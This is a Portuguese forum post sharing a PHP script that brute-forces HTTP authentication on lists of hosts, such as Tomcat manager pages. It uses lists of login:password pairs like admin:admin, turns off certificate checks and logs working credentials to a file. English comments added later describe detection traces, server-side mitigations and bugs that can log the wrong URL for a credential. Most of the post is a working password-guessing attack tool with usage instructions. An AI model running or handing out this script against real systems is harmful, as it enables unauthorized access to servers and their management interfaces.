Olá a todos!
Aqui um simples script para brute em http auth's.
Com um simples parse da resposta http obtida podemos obter o redirecionamento de login:senha corretos (:
Uso:
Code:
[]'s
Aqui um simples script para brute em http auth's.
Com um simples parse da resposta http obtida podemos obter o redirecionamento de login:senha corretos (:
Uso:
php auth_brute.php host_list user_list thread
Código PHP:
<?php
/*
* Simple http brute by n4sss.
* To brute simple auth's :3
*
* Tomcat example:
* http://localhost:8080/manager/html
*
* etc.
*
*
* */
/**
 * Appends one line of text to a file.
 *
 * The file is opened in append mode ("a"), so existing content is kept.
 * A newline is written after $content. The result of fopen() is not checked.
 *
 * @param string $content Text to append (the trailing newline is added here).
 * @param string $file    Path of the file to append to.
 */
function save_buf($content, $file)
{
    $handle = fopen($file, 'a');
    fwrite($handle, "{$content}\n");
    fclose($handle);
}
/**
 * Requests every URL in $list once per entry of $users, sending that entry as
 * the HTTP authentication credential, and logs URL/credential pairs whose
 * final response status is 200.
 *
 * For each credential entry the URL list is split with array_chunk(), one cURL
 * easy handle is created per non-empty URL, all handles are attached to one
 * curl_multi handle, and the multi handle is driven until no transfer is
 * still running.
 *
 * Notes for defenders and incident responders:
 * - The outer loop is over credentials and the inner one over URLs, so a
 *   single server receives one attempt per credential entry per sweep.
 *   Alerting that only counts rapid failures per host can under-count this
 *   pattern; counting failed authentications per source address across hosts
 *   does not.
 * - CURLAUTH_ANY lets libcurl choose the scheme; libcurl normally probes the
 *   server before sending credentials, so each attempt tends to show up as an
 *   unauthenticated request followed by an authenticated one (TODO confirm
 *   against the libcurl version in use).
 * - Matches are appended to "Bruteds_auth.txt", a relative path, so the file
 *   lands in the working directory of the process. Its presence on a host is
 *   a useful artifact to search for.
 * - Mitigations on the server side are the usual ones for password guessing:
 *   no default credentials, lockout or rate limiting on failed
 *   authentication, and management interfaces reachable only from trusted
 *   networks.
 *
 * @param array      $list   URLs to request (each is passed to CURLOPT_URL).
 * @param array      $users  Credential entries passed to CURLOPT_USERPWD; the
 *                           usage text describes them as "login:password".
 * @param int|string $thread Chunk size given to array_chunk().
 *
 * @return void
 */
function http_brute($list, $users, $thread){
foreach($users as $common){
// A new multi handle is created for every credential entry. Neither it nor
// the easy handles are closed anywhere in this function.
$multi = curl_multi_init();
$th = array_chunk($list, $thread);
foreach($th as $request){
for($i=0;$i<=count($request)-1;$i++){
if(!empty($request[$i]) && !empty($common))
{
print "- Bruting -> {$request[$i]} -> {$common}\n";
// $i is the position inside the current chunk, so the same keys of $curl are
// written again for every chunk.
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_URL, "$request[$i]");
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl[$i], CURLOPT_USERPWD, "$common");
curl_setopt($curl[$i], CURLOPT_HTTPAUTH, CURLAUTH_ANY);
// Certificate verification is switched off: over HTTPS the peer is not
// authenticated, so the credentials can be read by anyone able to intercept
// the connection.
curl_setopt($curl[$i], CURLOPT_SSL_VERIFYPEER, false);
// Redirects are followed, so the status inspected below is that of the last
// response in the chain, not necessarily of the URL that was requested.
curl_setopt($curl[$i], CURLOPT_FOLLOWLOCATION, true);
curl_multi_add_handle($multi, $curl[$i]);
}
}
}
// Run all queued transfers. $handle receives the number of transfers still
// running; usleep(1) pauses for one microsecond, so this is close to a busy
// loop.
do{
curl_multi_exec($multi, $handle);
usleep(1);
}while($handle>0);
// NOTE(review): $curl is keyed by position inside a chunk and is never reset,
// and $request still holds the last chunk at this point. When the list spans
// more than one chunk, the pair printed and logged below may not name the URL
// that actually answered. Treat a recovered results file as a lead, not as
// proof of a valid credential.
foreach($curl as $curl_id => $content){
$info = curl_getinfo($content);
curl_multi_remove_handle($multi, $content);
// A final status of 200 is the only success criterion. A URL that needs no
// authentication also returns 200 for any credential.
if($info['http_code'] == 200){
print "[+] $common -> $request[$curl_id]\n";
save_buf("$request[$curl_id] -> $common", "Bruteds_auth.txt");
print "Writed to -> Bruteds_auth.txt\n";
}
}
}
}
// Entry point.
//   argv[1]  file with one target URL per line
//   argv[2]  file with one "login:password" entry per line
//   argv[3]  chunk size handed to http_brute()
// Only argv[1] and argv[2] are checked for presence; argv[3] is used as given.
if (!empty($argv[1]) && !empty($argv[2])) {
    // Empty entries are dropped from the URL list only. The credential list is
    // passed on unfiltered; http_brute() skips empty entries itself.
    $list = array_filter(explode("\n", file_get_contents("{$argv[1]}")));
    $users = explode("\n", file_get_contents("{$argv[2]}"));
    $thread = trim("{$argv[3]}");

    echo "-= Http auth brute by n4sss =-\n";
    echo "When we brute hosts, results can be founds at -> Bruteds_auth.txt\n";
    echo "[+] Good luck\n";
    sleep(4);

    http_brute($list, $users, $thread);
} else {
    // Missing arguments: print the usage text and do nothing else.
    echo "-= Http auth brute by n4sss =-\n";
    echo "To use:\n";
    echo "php {$argv[0]} host_list user_list thread\n";
    echo "----------------------------------------\n";
    echo "User type: admin:admin\n";
    echo " admin:123456\n";
    echo " admin:4dm1n\n";
    echo "Example:\n";
    echo "php {$argv[0]} 200_210 user_list 10\n";
}
?>